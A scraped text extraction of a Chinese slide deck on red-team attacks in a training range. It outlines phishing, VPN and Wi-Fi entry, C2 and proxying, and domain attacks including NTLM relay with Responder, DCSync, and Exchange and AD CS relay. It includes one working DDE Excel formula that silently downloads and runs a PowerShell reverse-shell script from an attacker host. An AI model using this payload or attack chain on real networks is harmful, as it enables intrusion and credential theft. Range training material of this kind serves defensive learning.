基于靶场的红队攻击视角-蛇矛安全Pachimker（29页）.pptx

1、基于靶场的红队攻击视角,蛇矛实验室-Pachimker,核心成员介绍,Ivan,Pachimker,Sunrise,Ordar,Do vis,蛇矛认知篇,现实网络,现实设备,攻防路径,靶场认知篇,靶场有什么用？,靶场的多种玩法,企业内网攻防,Log4j2漏洞验证,近源渗透,域安全专项技能训练,工控网络安全验证,邮件也可以作为进入入口的方式之一，一些暴漏在外的邮箱应用、邮箱弱口令、自身存在的漏洞等等都可以进行相关利用，左侧攻击链路中采用的是钓鱼的方式，规模较大的企业/机构，往往钓鱼方式来的最直接。,关于红队攻击链路一,关于红队攻击链路二,打入口通过VPN也是比较有效的方式，通过钓鱼、口令、自身漏

2、洞等问题，可以快速的进入内网。近源渗透通常会利用Wi-Fi、USB、暴漏网口等方法进行攻击。,关于红队攻击链路三,小型的企业网通常需要前期的信息搜集分析，应用类的弱点只是其中一部分，包括说组织架构的分析等等也尤为重要，通过组织架构可以大概判定出网络划分的区域等信息，则对后续渗透的目的有前期信息的铺垫。,常规渗透过程,官网访问,邮箱地址获取,官网伪造,后门程序生成,C2监听,钓鱼邮件发送,目标上线,Socks代理,账号信息获取/3389开启,内网信息搜集/后门制作,主机权限钓鱼邮件发送,内网高权限主机上线,提权,代理设置,FlashFXP密码破解,FTP登录,FTP+Chrome钓鱼,NTLM密

3、文解密,端口转发,域管账号登陆,FileServer权限获取,敏感文件获取,文件回传,拓扑图,常用钓鱼的方法-DDE,回连触发,环境：Mail服务端：192.168.10.3Mail客户端：192.168.10.4攻击机kail（88.88.88.100）攻击机Windows(88.88.88.200),A1公式:=cmd|/c powershell.exe-w hidden IEX(New-Object Net.WebClient).DownloadString(http:/10.0.0.1:8080/Invoke-PowerShellTcp.ps1);!_xlbgnm.TableNumbe

4、r,常用钓鱼的方法-宏,选中菜单栏中的“视图”“宏”来给文档添加恶意代码。,另存为dotm,新建docx文档为zip并解压,修改链接为url下的dotm,上线,关于靶场中的近源渗透,Wi-Fi破解:企业中存在很多的Wi-Fi或者热点，利用近点信号扫描，破解Wi-Fi，从而登录Wi-Fi进行内网渗透,环境：虚拟Wi-fi：10.7.7.1Wi-fi客户端：10.7.7.103攻击机kail（88.88.88.100）,信号扫描,握手包抓取,Wi-Fi登录,内网攻击,域渗透-NTLM中继,Smb中继：链接客户端时默认使用本机用户和密码hash进行登录，通过模拟smb服务器截获其他pc的NTLM h

5、ash。,环境：服务端：DC(192.168.10.3)客户端：DC(192.168.10.4)攻击机kail（88.88.88.100）,Responder.py,事件监听,目标输入用户名密码,net-NTLM hash,域渗透-NTLM中继,DSYNC中继:利用DC1与DC2通信过程中发起的请求并重复的特性，通过 DRS 服务的 GetNCChanges 接口向域控发起数据同步请求。,环境：服务端：DC(192.168.10.3)客户端：DC(192.168.10.4)攻击机kail（88.88.88.100）,利用 DCSync 导出域内哈希,利用 DCSync 进行权限维持,利用Pow

6、ershell添加ACE,Hash获取成功,域渗透-NTLM中继,Exchange漏洞中继:可以使用任意域内用户通过NTLM Relay获取到krbtgt的hash。,环境：Windows Server 2012(域控)：192.168.31.2Exchange2013：192.168.31.3攻击者Kali：88.88.88.100,Kali设置NTLM中继,提权脚本执行,中继成功,导出Hash,域渗透-NTLM中继,AD CS中继:可以使用任意域内用户通过NTLM Relay获取到krbtgt的hash。,环境：DC：192.168.30.2AD C